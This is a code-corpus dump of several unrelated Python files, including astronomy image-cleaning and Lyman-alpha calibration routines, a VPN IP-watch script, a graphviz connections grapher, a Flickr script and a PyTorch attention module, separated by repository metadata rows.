    inner radius `r1` and width `dr` centred on the image, and subtracted
    from the whole frame. Returns the corrected image and the residual
    mean of the ring after subtraction.
    """
    size = imA.shape[0]
    center = size // 2
    rows, cols = np.ogrid[:size, :size]
    # Same integer-squared radius formula as the historical implementation.
    radii = np.sqrt((cols - center)**2 + (rows - center)**2)
    annulus = (r1 <= radii) & (radii <= r1 + dr)
    try:
        # Offset so all pixels are positive before measuring the background.
        shifted = imA + 1.01*abs(imA.min())
        level = np.mean(shifted[annulus])
        corrected = shifted - level
        residual = np.mean(corrected[annulus])
    except IndexError:
        # Ring indices did not fit the image: return the input unchanged.
        corrected = imA.copy()
        residual = 0
        if verbose:
            cprint('Warning: Background not computed', 'green')
            cprint(
                '-> check the inner and outer radius rings (checkrad option).', 'green')
    return corrected, residual
def fix_bad_pixels(image, bad_map, add_bad=None, x_stddev=1):
    """Replace bad pixels with values interpolated from their neighbours.

    Bad pixels are set to NaN and then filled by convolving the image with
    a 2-D gaussian kernel (`interpolate_replace_nans`).

    Parameters
    ----------
    image : 2-D array
        Image to be fixed.
    bad_map : 2-D array
        Map with 1 marking a bad pixel and 0 a good one. NOTE: modified
        in place when `add_bad` is given (same convention as the rest of
        this module).
    add_bad : list of 2-d coordinate pairs, optional
        Extra bad pixels / cosmic rays to flag in `bad_map`. The default
        is None instead of a mutable `[]` to avoid the shared-default
        pitfall; passing a list keeps the old behaviour.
    x_stddev : float
        Standard deviation of the gaussian interpolation kernel (default: 1).

    Returns
    -------
    2-D array with the bad pixels replaced by interpolated values.
    """
    if add_bad is not None and len(add_bad) != 0:
        # Coordinates follow the original bad_map[c0, c1] indexing order.
        for c0, c1 in add_bad:
            bad_map[c0, c1] = 1
    img_nan = image.copy()
    img_nan[bad_map == 1] = np.nan
    kernel = Gaussian2DKernel(x_stddev=x_stddev)
    return interpolate_replace_nans(img_nan, kernel)
def check_data_params(filename, isz, r1, dr, bad_map=None, add_bad=[],
                      edge=0, remove_bad=True, nframe=0, ihdu=0, f_kernel=3,
                      offx=0, offy=0, apod=False, window=None):
    """ Display one frame of the datacube with the cleaning parameters
    overlaid (sky annulus, crop box, centering position, bad pixels), so the
    user can sanity-check them before running the actual cleaning.

    Parameters:
    -----------
    `filename` {str}: filename containing the datacube,\n
    `isz` {int}: Size of the cropped image (default: 256)\n
    `r1` {int}: Radius of the rings to compute background sky (default: 100)\n
    `dr` {int}: Outer radius to compute sky (default: 10)\n
    `bad_map` {array}: Bad pixel map with 0 and 1 where 1 set for a bad pixel (default: None),\n
    `add_bad` {list}: List of 2d coordinates of bad pixels/cosmic rays (default: []),\n
    `edge` {int}: Number of pixel to be removed on the edge of the image (SPHERE),\n
    `remove_bad` {bool}: If True, the bad pixels are removed using a gaussian interpolation,\n
    `nframe` {int}: Frame number to be shown (default: 0),\n
    `ihdu` {int}: Hdu number of the fits file. Normally 1 for NIRISS and 0 for SPHERE (default: 0).

    Returns the matplotlib figure.
    """
    data = fits.open(filename)[ihdu].data
    img0 = data[nframe]
    # Zero out a band of `edge` pixels on all four borders (SPHERE artifact).
    if edge != 0:
        img0[:, 0:edge] = 0
        img0[:, -edge:-1] = 0
        img0[0:edge, :] = 0
        img0[-edge:-1, :] = 0
    # NOTE(review): bitwise & on two booleans works here, but `and` would be clearer.
    if (bad_map is not None) & (remove_bad):
        img1 = fix_bad_pixels(img0, bad_map, add_bad=add_bad)
    else:
        img1 = img0.copy()
    # crop_max recenters on the (smoothed) image maximum; element 1 of the
    # returned tuple is the detected center position.
    cropped_infos = crop_max(img1, isz, offx=offx, offy=offy, f=f_kernel)
    pos = cropped_infos[1]
    noBadPixel = False
    bad_pix_x, bad_pix_y = [], []
    # NOTE(review): if bad_map is None but add_bad is non-empty, the
    # assignment below would fail on a None bad_map -- TODO confirm callers
    # always pass bad_map together with add_bad.
    if (bad_map is not None) or (len(add_bad) != 0):
        for j in range(len(add_bad)):
            bad_map[add_bad[j][0], add_bad[j][1]] = 1
        bad_pix = np.where(bad_map == 1)
        bad_pix_x = bad_pix[0]
        bad_pix_y = bad_pix[1]
    else:
        noBadPixel = True
    # Inner (r1) and outer (r2) sky-annulus circles, sampled at 100 angles.
    r2 = r1 + dr
    theta = np.linspace(0, 2*np.pi, 100)
    x0 = pos[0]
    y0 = pos[1]
    x1 = r1 * np.cos(theta) + x0
    y1 = r1 * np.sin(theta) + y0
    x2 = r2 * np.cos(theta) + x0
    y2 = r2 * np.sin(theta) + y0
    if window is not None:
        # Optional apodization-window circle.
        r3 = window
        x3 = r3 * np.cos(theta) + x0
        y3 = r3 * np.sin(theta) + y0
    # Corners of the isz x isz box that would be kept after cropping.
    xs1, ys1 = x0 + isz//2, y0 + isz//2
    xs2, ys2 = x0 - isz//2, y0 + isz//2
    xs3, ys3 = x0 - isz//2, y0 - isz//2
    xs4, ys4 = x0 + isz//2, y0 - isz//2
    max_val = img1[y0, x0]
    fig = plt.figure(figsize=(6, 6))
    plt.imshow(img1, norm=PowerNorm(.5), cmap='afmhot', vmin=0, vmax=max_val)
    plt.plot(x1, y1, label='Inner radius for sky subtraction')
    plt.plot(x2, y2, label='Outer radius for sky subtraction')
    if apod:
        if window is not None:
            plt.plot(x3, y3, label='Super-gaussian windowing')
    plt.plot(x0, y0, '+', color='g', ms=10, label='Centering position')
    plt.plot([xs1, xs2, xs3, xs4, xs1], [ys1, ys2, ys3, ys4, ys1], 'w--',
             label='Resized image')
    if not noBadPixel:
        if remove_bad:
            label = 'Fixed hot/bad pixels'
        else:
            label = 'Hot/bad pixels'
        # NOTE(review): color='' may be rejected by recent matplotlib
        # releases; facecolors='none' is the usual way to get open markers.
        plt.scatter(bad_pix_y, bad_pix_x, color='', marker='s',
                    edgecolors='r', s=20, label=label)
    plt.legend(fontsize=7, loc=1)
    plt.tight_layout()
    return fig
def clean_data(data, isz=None, r1=None, dr=None, edge=0,
               r2=None, bad_map=None, add_bad=[], apod=True,
               offx=0, offy=0, sky=True, window=None,
               f_kernel=3, verbose=False):
    """ Clean data: per frame, patch edges, fix bad pixels, recenter/crop,
    subtract the sky background and (optionally) apodize.

    Parameters:
    -----------
    `data` {np.array} -- datacube containing the NRM data\n
    `isz` {int} -- Size of the cropped image (default: {None})\n
    `r1` {int} -- Radius of the rings to compute background sky (default: {None})\n
    `dr` {int} -- Outer radius to compute sky (default: {None})\n
    `edge` {int} -- Patch the edges of the image (VLT/SPHERE artifact, default: {200}),\n

    Returns:
    --------
    `cube` {np.array} -- Cleaned datacube (or None if the crop is not square).
    """
    # print(data.shape[1])
    # if data.shape[1] % 2 == 1:
    #     data = np.array([im[:-1, :-1] for im in data])
    n_im = data.shape[0]
    cube_cleaned = np.zeros([n_im, isz, isz])
    for i in tqdm(range(n_im), ncols=100, desc='Cleaning', leave=False):
        img0 = data[i]
        # Zero out `edge` pixels on every border (detector artifact patching).
        if edge != 0:
            img0[:, 0:edge] = 0
            img0[:, -edge:-1] = 0
            img0[0:edge, :] = 0
            img0[-edge:-1, :] = 0
        if bad_map is not None:
            img1 = fix_bad_pixels(img0, bad_map, add_bad=add_bad)
        else:
            img1 = img0.copy()
        # Recenter and crop to isz x isz around the (smoothed) maximum.
        im_rec_max = crop_max(img1, isz, offx=offx, offy=offy, f=f_kernel)[0]
        if sky:
            img_biased = sky_correction(im_rec_max, r1=r1, dr=dr,
                                        verbose=verbose)[0]
        else:
            img_biased = im_rec_max.copy()
        img_biased[img_biased < 0] = 0  # Remove negative pixels
        if img_biased.shape[0] != img_biased.shape[1]:
            cprint(
                '\nCropped image do not have same X, Y dimensions -> check isz', 'red')
            return None
        if apod:
            # NOTE(review): r2 is defaulted here but never used --
            # apply_windowing is called with `window` only. TODO confirm.
            if r2 is None:
                r2 = isz//3
            img = apply_windowing(img_biased, window=window)
        else:
            img = img_biased.copy()
        cube_cleaned[i] = img
    return cube_cleaned
def select_clean_data(filename, isz=256, r1=100, r2=None, dr=10, edge=0,
                      clip=True, bad_map=None, add_bad=[], offx=0, offy=0,
                      clip_fact=0.5, apod=True, sky=True, window=None,
                      f_kernel=3, verbose=False, ihdu=0, display=False):
    """ Clean and select good datacube (sigma-clipping using fluxes variations).

    Parameters:
    -----------
    `filename` {str}: filename containing the datacube,\n
    `isz` {int}: Size of the cropped image (default: 256)\n
    `r1` {int}: Radius of the rings to compute background sky (default: 100)\n
    `dr` {int}: Outer radius to compute sky (default: 10)\n
    `edge` {int}: Patch the edges of the image (VLT/SPHERE artifact, default: {100}),\n
    `clip` {bool}: If True, sigma-clipping is used to reject frames with low integrated flux,\n
    `clip_fact` {float}: Relative sigma if rejecting frames by sigma-clipping
    (default=0.5),\n

    Returns:
    --------
    `cube_final` {np.array}: Cleaned and selected datacube (None on failure).
    """
    # NOTE(review): the HDU list is never closed -- consider
    # `with fits.open(filename) as hdu:` if lazy loading allows it.
    hdu = fits.open(filename)
    cube = hdu[ihdu].data
    hdr = hdu[0].header
    # Report the observing conditions stored in the SPHERE header.
    if hdr['INSTRUME'] == 'SPHERE':
        seeing_start = float(hdr['HIERARCH ESO TEL AMBI FWHM START'])
        seeing = float(hdr['HIERARCH ESO TEL IA FWHM'])
        seeing_end = float(hdr['HIERARCH ESO TEL AMBI FWHM END'])
        if verbose:
            print('\n----- Seeing conditions -----')
            print("%2.2f (start), %2.2f (end), %2.2f (Corrected AirMass)" %
                  (seeing_start, seeing_end, seeing))
    raw_size = cube.shape[1]
    if isz > raw_size:
        raise ValueError(
            'Reshape factor is larger than the data size (choose a smaller isz).')
    # Per-frame cleaning (edges, bad pixels, crop, sky, apodization).
    cube_cleaned = clean_data(cube, isz=isz, r1=r1, edge=edge,
                              r2=r2, bad_map=bad_map, add_bad=add_bad,
                              dr=dr, sky=sky, apod=apod, window=window,
                              f_kernel=f_kernel, offx=offx, offy=offy,
                              verbose=verbose)
    if cube_cleaned is None:
        return None
    # Frame selection: sigma-clipping on the integrated fluxes.
    cube_final = select_data(cube_cleaned, clip=clip, clip_fact=clip_fact,
                             verbose=verbose, display=display)
    return cube_final
| 36.805755 | 118 | 0.573495 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5,602 | 0.364975 |
4440960cf020e65d9360167e1a2a885b0c4dd7d8 | 5,107 | py | Python | lyaf_optdepth/corrections.py | VikrantKamble/lyaf_optdepth | 899048ab73e546513b3713b3818abfab3ce3ab05 | [
"MIT"
] | null | null | null | lyaf_optdepth/corrections.py | VikrantKamble/lyaf_optdepth | 899048ab73e546513b3713b3818abfab3ce3ab05 | [
"MIT"
] | null | null | null | lyaf_optdepth/corrections.py | VikrantKamble/lyaf_optdepth | 899048ab73e546513b3713b3818abfab3ce3ab05 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import binned_statistic
def var_correct(qso, rest_ranges=None, zq_range=[1.6, 4.], fit_model=True,
                savefile=False):
    """ Corrections to the variance assigned to the pixels by the pipeline.

    Computes eta = N / chi^2 per spectrum over fixed restframe windows and
    bins it against mean observed wavelength.

    Notes:
    1. Scaling spectra doesn't affect this estimate
    2. If the spectra changes by a lot (isn't flat), it will lead to
       underestimates of eta
    """
    if rest_ranges is None:
        rest_ranges = [[1350, 1360], [1470, 1480]]
    # Quasars in the requested redshift range with decent S/N.
    zq_ind = np.where((qso.zq > zq_range[0]) & (qso.zq <= zq_range[1]) & (qso.sn > 5))[0]
    # restframe ranges over which to analyze
    # currently this allows for only a single bin
    if np.asarray(rest_ranges).ndim == 1:
        raise TypeError("Please provide the ranges as two dimensional array")
    lambda_mean, eta = [], []
    for ranges in rest_ranges:
        ind_set = (qso.wl > ranges[0]) & (qso.wl <= ranges[1])
        # create local flux and ivar matrices
        loc_flux = qso.flux[zq_ind[:, None], ind_set]
        loc_ivar = qso.ivar[zq_ind[:, None], ind_set]
        # mask to select pixels that provide information
        ivar_mask = loc_ivar > 0
        # sum of good pixels along each spectra where num is greater than 10
        num = np.sum(ivar_mask, 1)
        num_ind = num > 10
        # chi-square along each spectra
        # eta = N / sum((f_i - mu)^2 / sigma_i^2)
        mu = np.average(loc_flux[num_ind], weights=loc_ivar[num_ind], axis=1)
        chisq = np.sum((
            loc_flux[num_ind] - mu[:, None]) ** 2 * loc_ivar[num_ind], axis=1)
        lambda_obs = np.array((np.mat(qso.wl[ind_set]).T *
                               np.mat(1 + qso.zq[zq_ind][num_ind]))).T
        # mean of observed wavelength spanned along each spectra
        lambda_mean += list(np.average(lambda_obs, weights=ivar_mask[num_ind], axis=1))
        # eta values along each spectra
        eta += list(num[num_ind] / chisq)
    # binned statistic with scipy
    y, bin_edges, __ = binned_statistic(lambda_mean, eta,
                                        statistic='mean', bins=100)
    bin_width = (bin_edges[1] - bin_edges[0])
    X = bin_edges[1:] - bin_width/2
    # plot the results if specified
    fig, ax = plt.subplots(1)
    ax.plot(X, y, '+', color='k', markersize=8)
    # fit a simple piecewise function to the data (linear below 5850 A,
    # quadratic above)
    if fit_model:
        popt1 = np.polyfit(X[X < 5850], y[X < 5850], deg=1)
        popt2 = np.polyfit(X[X > 5850], y[X > 5850], deg=2)
        xline1 = np.linspace(3500, 5850, 100)
        ax.plot(xline1, np.polyval(popt1, xline1), '-r')
        xline2 = np.linspace(5850, 7500, 100)
        ax.plot(xline2, np.polyval(popt2, xline2), '--r')
    ax.set_xlabel(r'$\lambda_\mathrm{obs} [\mathrm{\AA}]$')
    plt.show()
    # NOTE(review): popt1/popt2 only exist when fit_model=True, so
    # savefile=True with fit_model=False raises NameError -- TODO guard.
    if savefile:
        np.savetxt("var_correct.txt", list(popt1) + list(popt2))
def calibrate(wl, spec, ivar, zq, rest_range, norm_min, norm_max, savetag,
              plotit=False):
    """ Obtain flux calibration vector by doing optical depth analysis redwards
    of Lyman-Alpha.

    Only the shape is estimated, the overall normalization is unconstrained.
    The vector is optionally plotted and written to
    ../Data/calibration<savetag>.dat when `savetag` is not None.
    """
    # Collect relevant indices over restframe
    r_ind = []
    for j in range(len(rest_range)):
        foo = np.where((wl > rest_range[j][0]) & (wl < rest_range[j][1]))[0]
        r_ind = np.concatenate((r_ind, foo))
    rInd = r_ind.astype(int)
    # Obtain the corresponding data matrices
    lam_obs = np.array(np.mat(wl[rInd]).T * np.mat(1 + zq)).T
    cflux, civar = spec[:, rInd], ivar[:, rInd]
    # Scale to the same baseline
    # this will introduce addtional errors that we are neglecting
    nValue = np.zeros(len(rInd))
    for i in range(len(rInd)):
        blah = np.where((lam_obs[:, i] > norm_min) & (lam_obs[:, i] < norm_max)
                        & (civar[:, i] > 0))[0]
        nValue[i] = np.average(cflux[:, i][blah], weights=civar[:, i][blah])
    # Scale fluxes and ivars accordingly
    NormFlux = cflux / nValue
    NormIvar = civar * nValue ** 2
    pixObs = np.ravel(lam_obs)
    pixFlux, pixIvar = np.ravel(NormFlux), np.ravel(NormIvar)
    # Controls the smoothing of the results (3 A wide observed-frame bins)
    ObsBin = np.arange(3500, 7000, 3)
    # Correction vector: ivar-weighted mean flux per observed-frame bin,
    # left at 0 where the bin has too few (<= 5) pixels.
    Cvec = np.zeros(len(ObsBin) - 1)
    for k in range(len(Cvec)):
        bInd = np.where((pixObs > ObsBin[k]) & (pixObs <= ObsBin[k + 1])
                        & (pixIvar > 0) & np.isfinite(pixFlux))[0]
        if len(bInd) > 5:
            Cvec[k] = np.average(pixFlux[bInd], weights=pixIvar[bInd])
    # Bin centers
    Lvec = (ObsBin[1:] + ObsBin[:-1])/2.
    if plotit:
        plt.figure()
        good = Cvec != 0
        plt.plot(Lvec[good], Cvec[good], '-k', lw=0.6)
        plt.xlabel(r'$\lambda_{obs}$')
        plt.ylabel(r'$Correction$')
        # plt.xlim(1.8 , 3)
        plt.ylim(0.9, 1.1)
        plt.axhline(1, c='r')
        plt.show()
    # NOTE(review): `good` is only defined inside the `plotit` branch, so
    # savetag != None with plotit=False raises NameError -- TODO guard.
    if savetag is not None:
        np.savetxt('../Data/calibration' + savetag + '.dat',
                   [Lvec[good], Cvec[good]])
# EOF
| 35.465278 | 89 | 0.585079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,428 | 0.279616 |
4440ac3805231c8fe777bc392e2e8cc3c24645a4 | 336 | py | Python | backend/common/databases/tosurnament/user.py | SpartanPlume/Tosurnament | 07e6b067a6c78a589de1a461789bce02352220fb | [
"MIT"
] | 7 | 2018-03-13T12:21:37.000Z | 2021-07-10T21:47:05.000Z | backend/common/databases/tosurnament/user.py | SpartanPlume/Tosurnament | 07e6b067a6c78a589de1a461789bce02352220fb | [
"MIT"
] | 44 | 2017-12-28T15:22:27.000Z | 2021-09-17T20:56:17.000Z | backend/common/databases/tosurnament/user.py | SpartanPlume/Tosurnament | 07e6b067a6c78a589de1a461789bce02352220fb | [
"MIT"
] | 9 | 2020-07-03T10:07:05.000Z | 2022-02-27T15:09:11.000Z | """User table"""
from mysqldb_wrapper import Base, Id
class User(Base):
    """A Tosurnament user row, linking a Discord account to an osu! account.

    Maps to the `user` table. Fields are declared by assigning empty
    instances of their type -- presumably how mysqldb_wrapper infers column
    types; TODO confirm against the wrapper's docs.
    """
    __tablename__ = "user"
    id = Id()  # primary key (mysqldb_wrapper Id type)
    discord_id = bytes()  # Discord account id (bytes -- presumably hashed/encrypted by the wrapper; verify)
    discord_id_snowflake = str()  # Discord snowflake id, kept as a string
    osu_id = str()  # osu! account id
    verified = bool()  # whether the osu!/Discord link has been verified
    code = bytes()  # verification code
    osu_name = str()  # current osu! username
    osu_name_hash = bytes()  # hash of the osu! username (presumably for lookups; verify)
    osu_previous_name = str()  # previous osu! username, if any
4444e7e0112d27b6a6afe52aecc7a8352ed7a487 | 801 | py | Python | snakeswitch.py | TheRedSpy15/Snakeswitch | 082a07d6994a04c6cecfaa0a0868a37bdd373b51 | [
"MIT"
] | null | null | null | snakeswitch.py | TheRedSpy15/Snakeswitch | 082a07d6994a04c6cecfaa0a0868a37bdd373b51 | [
"MIT"
] | null | null | null | snakeswitch.py | TheRedSpy15/Snakeswitch | 082a07d6994a04c6cecfaa0a0868a37bdd373b51 | [
"MIT"
] | null | null | null | from requests import get
import time
import gi
# Module-level defaults.  NOTE(review): main() assigns its own local
# `ip_starting` and `recon_command`, so those two globals are never read;
# only `rate` (the polling interval in seconds) is used by main().
ip_starting = ""
recon_command = ""
rate = 60
def main():
    """Watch the public IP and re-run the user's VPN command when it reverts.

    Prompts for a reconnect shell command, records the current (pre-VPN)
    public IP via api.ipify.org, then polls every `rate` seconds.  When the
    public IP matches the starting IP again (i.e. the VPN dropped), a
    desktop notification is shown and the reconnect command is executed.

    Runs forever; KeyboardInterrupt is handled by the caller.
    """
    import subprocess
    print("Example: nordvpn disconnect && nordvpn connect")
    # The user's own command, deliberately run through the shell below.
    recon_command = input("Enter the command used to reconnect to VPN: ")
    # The IP before the VPN is up: seeing it again later means the VPN dropped.
    ip_starting = get('https://api.ipify.org').text
    print("Starting ip:", ip_starting)
    print("Connect to your VPN now!")
    while True:
        time.sleep(rate)
        print("checking ip")
        if ip_starting == get('https://api.ipify.org').text:
            print("Snakeswitch activated")
            subprocess.run('notify-send Snakeswitch activated', shell=True)
            # shell=True so compound commands such as "a && b" work;
            # subprocess.run on a plain command string otherwise raises
            # FileNotFoundError instead of reconnecting.
            subprocess.run(recon_command, shell=True)
if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        # Ctrl-C: exit quietly instead of dumping a traceback.
        print('Interrupted')
        try:
            import sys
            sys.exit(0)
        except SystemExit:
            # sys.exit() raises SystemExit; fall back to a hard exit that
            # bypasses cleanup handlers.
            import os
            os._exit(0)
44450985c3f99b89a21c4bb41bf9942469e1672d | 3,093 | py | Python | consumerui/grapher.py | AlexRogalskiy/kubeplus | eba34118cf721391abd9f97196bbfaa85c6f5079 | [
"Apache-2.0"
] | 396 | 2018-03-30T19:56:17.000Z | 2022-03-23T09:35:31.000Z | grapher/connections.py | cloud-ark/kubeplus | 1ee8fdd1dc53f83316883752a8ebb33708faedaf | [
"Apache-2.0"
] | 182 | 2018-04-24T03:12:00.000Z | 2022-02-28T18:27:11.000Z | grapher/connections.py | AlexRogalskiy/kubeplus | eba34118cf721391abd9f97196bbfaa85c6f5079 | [
"Apache-2.0"
] | 64 | 2018-04-25T00:02:37.000Z | 2022-03-16T02:46:03.000Z | import sys
import json
import subprocess
import sys
import os
from graphviz import Digraph
from graphviz import Graph
class ConnectionsGraph(object):
    """Render a KubePlus resource-connections JSON file as a Graphviz image."""

    # Edge color per relationship type; unknown types fall back to 'gray0'.
    EDGE_COLORS = {
        'specproperty': 'crimson',
        'label': 'darkgreen',
        'envvariable': 'gold4',
        'annotation': 'indigo',
        'owner reference': 'blue',
    }

    def draw(self, connections_json, output_folder, relsToHide):
        """Read `<output_folder>/<connections_json>` and render it as a PNG.

        Parameters:
        -----------
        `connections_json` {str}: name of the connections JSON file (a list
            of nodes with Kind/Name/Level and peer/relationship fields),\n
        `output_folder` {str}: directory containing the JSON file,\n
        `relsToHide` {str}: comma-separated relationship types whose details
            should be omitted from the edge labels.

        The rendered graph is written under /root/<connections_json>.gv.
        """
        # (A leftover debug `ls -ltr /root/` subprocess call was removed.)
        # `with` guarantees the file handle is closed; the original left it open.
        with open(output_folder + "/" + connections_json, "r") as fp:
            json_output = json.loads(fp.read())

        # Group nodes by their depth in the connection tree.
        nodemap = {}
        for n in json_output:
            nodemap.setdefault(n['Level'], []).append(n)

        opformat = 'png'
        dot = Graph(comment='Connections Graph', format=opformat)

        relsToHideList = [rel.strip() for rel in relsToHide.split(",")]

        # One box node per resource; one edge per relationship (level > 0).
        for level, nodelist in nodemap.items():
            for n in nodelist:
                fqnodename = n['Kind'] + " " + n['Name']
                fqpeername = n['PeerKind'] + " " + n['PeerName']
                if n['Kind'] == 'Pod':
                    dot.node(fqnodename, fqnodename, shape='box', style='filled', color='lightcyan1')
                else:
                    dot.node(fqnodename, fqnodename, shape='box', style='filled', color='snow2')
                if level > 0:
                    relationshipType = n['RelationType']
                    relationshipDetails = n['RelationDetails']
                    relationInfo = relationshipType
                    # Append the details unless this relation type is hidden.
                    if relationshipDetails != '' and relationshipType not in relsToHideList:
                        relationInfo = relationInfo + " (" + relationshipDetails + ")"
                    color = self.EDGE_COLORS.get(relationshipType, 'gray0')
                    dot.edge(fqpeername, fqnodename, color=color, label=relationInfo)

        filename = connections_json + ".gv"
        dot.render('/root/' + filename, view=False)
if __name__ == '__main__':
    # CLI usage: connections.py <connections_json> <output_folder> [relsToHide]
    graph = ConnectionsGraph()
    #print("Inside connections.py")
    connections_json = sys.argv[1]
    output_folder = sys.argv[2]
    # Optional third argument: comma-separated relationship types whose
    # details are hidden in the edge labels.
    if len(sys.argv) == 4:
        relsToHide = sys.argv[3]
    else:
        relsToHide = ""
    #print("Connections_json:"+ connections_json)
    #print("Output folder:" + output_folder)
    #print(relsToHide)
    graph.draw(connections_json, output_folder, relsToHide)
| 30.029126 | 106 | 0.669253 | 2,578 | 0.833495 | 0 | 0 | 0 | 0 | 0 | 0 | 1,034 | 0.334303 |
44460ed3ad075b11814a0994ca4285eafdbb39b1 | 823 | py | Python | scratch/interesting_cc.py | mikeboers/PyFlickr | 60f258ad6a5266fa8d8e6f6dc829e90e61df9696 | [
"BSD-3-Clause"
] | null | null | null | scratch/interesting_cc.py | mikeboers/PyFlickr | 60f258ad6a5266fa8d8e6f6dc829e90e61df9696 | [
"BSD-3-Clause"
] | null | null | null | scratch/interesting_cc.py | mikeboers/PyFlickr | 60f258ad6a5266fa8d8e6f6dc829e90e61df9696 | [
"BSD-3-Clause"
] | null | null | null | import os
import sys
import datetime
from pprint import pprint
import logging
logging.basicConfig(file=sys.stderr, level=logging.DEBUG)
from flickr import Flickr
from flickr.util import *
key = os.environ.get('FLICKR_KEY')
secret = os.environ.get('FLICKR_SECRET')
if not (key and secret):
print 'please set FLICKR_KEY and FLICKR_SECRET'
exit(1)
flickr = Flickr((key, secret), format='json', echo=True)
one_day = datetime.timedelta(days=1)
date = datetime.date.today()
found = 0
while found < 10:
date -= one_day
print '---', date
for photo in flickr.interestingness.getList.iter(date=str(date), extras='license', per_page=25):
if photo['license'] == '0':
continue
found += 1
print found, short_url(photo['id'])
if found == 10:
break
| 21.657895 | 100 | 0.663426 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 104 | 0.126367 |
44474deb5fa0c086545a3adfa369f518e9e5f9f5 | 2,415 | py | Python | fused_biattention.py | utahnlp/layer_augmentation_qa | a3dd2d7af6f45b2aa500ff7612f77c31fb879cf0 | [
"Apache-2.0"
] | 6 | 2019-10-08T11:48:21.000Z | 2021-05-28T07:00:56.000Z | fused_biattention.py | utahnlp/layer_augmentation_qa | a3dd2d7af6f45b2aa500ff7612f77c31fb879cf0 | [
"Apache-2.0"
] | null | null | null | fused_biattention.py | utahnlp/layer_augmentation_qa | a3dd2d7af6f45b2aa500ff7612f77c31fb879cf0 | [
"Apache-2.0"
] | 1 | 2020-07-02T06:31:06.000Z | 2020-07-02T06:31:06.000Z | import sys
import torch
from torch import nn
from torch.autograd import Variable
from view import *
from holder import *
from util import *
from join_table import *
from trilinear_prod import *
from fusion import *
# fused bidir attention
class FusedBiAttention(torch.nn.Module):
	"""Fused bidirectional attention between context (C) and query (Q) encodings."""

	def __init__(self, opt, shared):
		super(FusedBiAttention, self).__init__()
		self.opt = opt
		self.shared = shared
		# Encoder width grows by elmo_size when elmo embeddings are enabled.
		if 'elmo' in opt.enc:
			enc_size = opt.hidden_size + opt.elmo_size
		else:
			enc_size = opt.hidden_size
		self.trilinear_prod = TrilinearProd(opt, enc_size)
		self.fusion = Fusion(opt, enc_size)
		self.softmax2 = nn.Softmax(2)
		self.phi_joiner = JoinTable(2)

	def biattention(self, scores, C, Q):
		"""Soft alignments in both directions plus the attended summaries."""
		batch_l = self.shared.batch_l		# unused, kept from the original
		context_l = self.shared.context_l	# unused, kept from the original
		enc_size = C.shape[2]				# unused, kept from the original
		# Row-wise softmax of the scores gives one attention direction;
		# transposing the score matrix gives the other.
		att_c2q = self.softmax2(scores)
		att_q2c = self.softmax2(scores.transpose(1, 2))
		# Weighted sums over the opposite side's encodings.
		attended_q = att_c2q.bmm(Q)
		attended_c = self.masked_fill_query(att_q2c.bmm(C))
		return att_c2q, att_q2c, attended_q, attended_c

	def masked_fill_scores(self, scores):
		"""Push masked score entries toward shared.neg_inf before softmax."""
		mask = self.shared.score_mask
		return scores * mask + (self.shared.one - mask) * self.shared.neg_inf

	def masked_fill_query(self, query):
		"""Zero out positions corresponding to query padding."""
		return self.shared.query_mask.unsqueeze(-1) * query

	# C: context encodings (batch_l, context_l, hidden_size)
	# Q: query encodings (batch_l, query_l, hidden_size)
	def forward(self, C, Q):
		"""Run fused biattention; stores G/P/attentions on self.shared."""
		self.update_context()
		batch_l = self.shared.batch_l			# unused, kept from the original
		context_l = self.shared.context_l		# unused, kept from the original
		max_query_l = self.shared.query_l.max()	# unused, kept from the original
		hidden_size = self.opt.hidden_size		# unused, kept from the original
		# Similarity scores with padding positions masked out.
		scores = self.masked_fill_scores(self.trilinear_prod(C, Q))
		att1, att2, agg1, agg2 = self.biattention(scores, C, Q)
		# Fuse each side with what it attended to.
		G = self.fusion(C, agg1)
		P = self.masked_fill_query(self.fusion(Q, agg2))
		# Bookkeeping for downstream layers.
		self.shared.att_soft1 = att1
		self.shared.att_soft2 = att2
		self.shared.G = G
		self.shared.P = P
		return att1, att2, G

	def update_context(self):
		"""Reads shared sizes only; retained verbatim from the original."""
		batch_l = self.shared.batch_l
		context_l = self.shared.context_l
		max_query_l = self.shared.query_l.max()
		word_vec_size = self.opt.word_vec_size
		hidden_size = self.opt.hidden_size

	def begin_pass(self):
		pass

	def end_pass(self):
		pass
| 23.446602 | 107 | 0.719669 | 2,166 | 0.896894 | 0 | 0 | 0 | 0 | 0 | 0 | 357 | 0.147826 |
4447797a9aae9e4e0e21cce2510d72157327de0f | 255 | py | Python | neos/secrets.py | mralext20/neos.py | 5e83a868969a9782ddfc7eba023108290ccda97c | [
"MIT"
] | 2 | 2021-03-30T16:24:19.000Z | 2021-04-06T08:20:55.000Z | neos/secrets.py | mralext20/neos.py | 5e83a868969a9782ddfc7eba023108290ccda97c | [
"MIT"
] | null | null | null | neos/secrets.py | mralext20/neos.py | 5e83a868969a9782ddfc7eba023108290ccda97c | [
"MIT"
] | null | null | null | import random
import string
def generate() -> str:
    """Generate a 12-character alphanumeric secret machine ID.

    Direct reimplementation of secretID.js from account.neosvr.com, but the
    characters are drawn from the OS CSPRNG (`random.SystemRandom`) instead
    of the default Mersenne Twister, since the value is used as a secret.

    Returns:
        str: 12 random characters from [a-zA-Z0-9].
    """
    length = 12
    valid_chars = string.ascii_letters + string.digits
    rng = random.SystemRandom()
    return "".join(rng.choice(valid_chars) for _ in range(length))
| 21.25 | 57 | 0.678431 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 70 | 0.27451 |
4449271c863f70b26b80fbfbede707ee87657d0c | 5,565 | py | Python | BresMaker.py | EvolveWithProseeker/Proseeker | 640c54952fc9295d03a2fdb22a452a8e4f6d4611 | [
"MIT"
] | 3 | 2021-05-31T00:56:30.000Z | 2022-03-23T14:24:09.000Z | BresMaker.py | EvolveWithProseeker/Proseeker | 640c54952fc9295d03a2fdb22a452a8e4f6d4611 | [
"MIT"
] | null | null | null | BresMaker.py | EvolveWithProseeker/Proseeker | 640c54952fc9295d03a2fdb22a452a8e4f6d4611 | [
"MIT"
] | 1 | 2022-03-24T08:49:30.000Z | 2022-03-24T08:49:30.000Z | # Simplified Bres Maker
# Version: 1.0
#Python Version: 2.0
# IMPORTS
import pandas as pd
import numpy as np
from sklearn.cluster import KMeans
from numpy import asarray
from numpy import savetxt
import sys
import os
# DEFINITIONS
